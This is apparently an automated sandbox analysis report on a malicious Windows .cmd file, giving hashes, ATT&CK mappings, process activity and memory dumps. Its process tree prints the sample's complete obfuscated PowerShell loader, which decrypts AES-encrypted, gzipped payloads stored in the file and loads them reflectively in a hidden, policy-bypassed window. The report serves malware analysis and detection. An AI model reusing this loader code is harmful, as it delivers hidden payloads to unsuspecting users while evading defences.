3e0590e42affae14f003fe2686abb8bd9be6e2fb48f7160779d0dc0c03cdfeee

General

Target

3e0590e42affae14f003fe2686abb8bd9be6e2fb48f7160779d0dc0c03cdfeee.cmd
Size

72KB
MD5

4bfe57ca78dd1ac468e92a2307783552
SHA1

73966e6a19ba6f1ea47002ddcbc42d5ac6434b22
SHA256

3e0590e42affae14f003fe2686abb8bd9be6e2fb48f7160779d0dc0c03cdfeee
SHA512

21a0071708eaeead1ebf0cb96ab39955b6ced797c0b9e25005c5c8ae4659f2ef842de42572f15fa02eb91df82eb5ba82b1b0d06d09d908d835f039f23fca4572
SSDEEP

1536:W4s6PYSYp0q0tIlQ2baGAIbsIpcEj/Bi81w2yfmfV2fymv:46PHY2glQ2nAIQUcY91Fj2fyi

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

2852 powershell.exe
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

powershell.exe

pid process

2852 powershell.exe
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

2852 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2852 powershell.exe

pid	process
2852	powershell.exe

pid	process
2852	powershell.exe

pid	process
2852	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2852	powershell.exe

Suspicious use of WriteProcessMemory 16 IoCs

Processes:

cmd.execmd.exe

description	pid	process	target process
PID 2332 wrote to memory of 1028	2332	cmd.exe	cmd.exe
PID 2332 wrote to memory of 1028	2332	cmd.exe	cmd.exe
PID 2332 wrote to memory of 1028	2332	cmd.exe	cmd.exe
PID 2332 wrote to memory of 1680	2332	cmd.exe	cmd.exe
PID 2332 wrote to memory of 1680	2332	cmd.exe	cmd.exe
PID 2332 wrote to memory of 1680	2332	cmd.exe	cmd.exe
PID 1680 wrote to memory of 2840	1680	cmd.exe	cmd.exe
PID 1680 wrote to memory of 2840	1680	cmd.exe	cmd.exe
PID 1680 wrote to memory of 2840	1680	cmd.exe	cmd.exe
PID 1680 wrote to memory of 2836	1680	cmd.exe	cmd.exe
PID 1680 wrote to memory of 2836	1680	cmd.exe	cmd.exe
PID 1680 wrote to memory of 2836	1680	cmd.exe	cmd.exe
PID 1680 wrote to memory of 2852	1680	cmd.exe	powershell.exe
PID 1680 wrote to memory of 2852	1680	cmd.exe	powershell.exe
PID 1680 wrote to memory of 2852	1680	cmd.exe	powershell.exe
PID 1680 wrote to memory of 2852	1680	cmd.exe	powershell.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\3e0590e42affae14f003fe2686abb8bd9be6e2fb48f7160779d0dc0c03cdfeee.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:2332
- C:\Windows\system32\cmd.exe
  cmd /c \"set __=^&rem\
  2⤵
  PID:1028
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\3e0590e42affae14f003fe2686abb8bd9be6e2fb48f7160779d0dc0c03cdfeee.cmd
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1680
- - C:\Windows\system32\cmd.exe
    cmd /c \"set __=^&rem\
    3⤵
    PID:2840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\3e0590e42affae14f003fe2686abb8bd9be6e2fb48f7160779d0dc0c03cdfeee.cmd';$jnWG='CopWZSmyTWZSmoWZSm'.Replace('WZSm', ''),'InlhpUvolhpUklhpUelhpU'.Replace('lhpU', ''),'CZIKWreaZIKWtZIKWeDeZIKWcZIKWryZIKWptoZIKWrZIKW'.Replace('ZIKW', ''),'ElzVbdemzVbdenzVbdtAzVbdtzVbd'.Replace('zVbd', ''),'ChayteonyteogeyteoEyteoxtyteoenyteosyteoionyteo'.Replace('yteo', ''),'ReplQraplQrdplQrLinplQresplQr'.Replace('plQr', ''),'EnRototRotorRotoyPRotooRotointRoto'.Replace('Roto', ''),'DecjqJxomjqJxpjqJxrjqJxesjqJxsjqJx'.Replace('jqJx', ''),'GeIEVqtCuIEVqrIEVqreIEVqntIEVqPrIEVqoIEVqcIEVqesIEVqsIEVq'.Replace('IEVq', ''),'FroWBktmBWBktasWBkte6WBkt4StWBktrWBktiWBktngWBkt'.Replace('WBkt', ''),'SpFryoliFryotFryo'.Replace('Fryo', ''),'MaoNWYinMoNWYodoNWYuoNWYloNWYeoNWY'.Replace('oNWY', ''),'LoZooQaZooQdZooQ'.Replace('ZooQ', ''),'TkUiTrankUiTsfokUiTrmkUiTFinkUiTalkUiTBkUiTlkUiTockkUiT'.Replace('kUiT', '');powershell -w hidden;function YsezZ($hYPZV){$VWSjA=[System.Security.Cryptography.Aes]::Create();$VWSjA.Mode=[System.Security.Cryptography.CipherMode]::CBC;$VWSjA.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$VWSjA.Key=[System.Convert]::($jnWG[9])('dIVP+hM/q3VrHeJIleztLe7YnRJfIUHX64EccbDbOY4=');$VWSjA.IV=[System.Convert]::($jnWG[9])('6IPeN2NKRdqw088nkuVbTg==');$BvjHr=$VWSjA.($jnWG[2])();$qFsMh=$BvjHr.($jnWG[13])($hYPZV,0,$hYPZV.Length);$BvjHr.Dispose();$VWSjA.Dispose();$qFsMh;}function ggFnh($hYPZV){$nRoYI=New-Object System.IO.MemoryStream(,$hYPZV);$BNSgW=New-Object System.IO.MemoryStream;$XVXGN=New-Object System.IO.Compression.GZipStream($nRoYI,[IO.Compression.CompressionMode]::($jnWG[7]));$XVXGN.($jnWG[0])($BNSgW);$XVXGN.Dispose();$nRoYI.Dispose();$BNSgW.Dispose();$BNSgW.ToArray();}$ldHdk=[System.IO.File]::($jnWG[5])([Console]::Title);$AAEWQ=ggFnh (YsezZ ([Convert]::($jnWG[9])([System.Linq.Enumerable]::($jnWG[3])($ldHdk, 5).Substring(2))));$xuGEv=ggFnh (YsezZ ([Convert]::($jnWG[9])([System.Linq.Enumerable]::($jnWG[3])($ldHdk, 6).Substring(2))));[System.Reflection.Assembly]::($jnWG[12])([byte[]]$xuGEv).($jnWG[6]).($jnWG[1])($null,$null);[System.Reflection.Assembly]::($jnWG[12])([byte[]]$AAEWQ).($jnWG[6]).($jnWG[1])($null,$null); "
    3⤵
    PID:2836
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -noprofile -windowstyle hidden -ep bypass
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2852

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2852-2-0x0000000073F91000-0x0000000073F92000-memory.dmp

Filesize
4KB

Download
memory/2852-3-0x0000000073F90000-0x000000007453B000-memory.dmp

Filesize
5.7MB

Download
memory/2852-4-0x0000000073F90000-0x000000007453B000-memory.dmp

Filesize
5.7MB

Download
memory/2852-5-0x0000000073F90000-0x000000007453B000-memory.dmp

Filesize
5.7MB

Download
memory/2852-6-0x0000000073F90000-0x000000007453B000-memory.dmp

Filesize
5.7MB

Download

Analysis

Sharing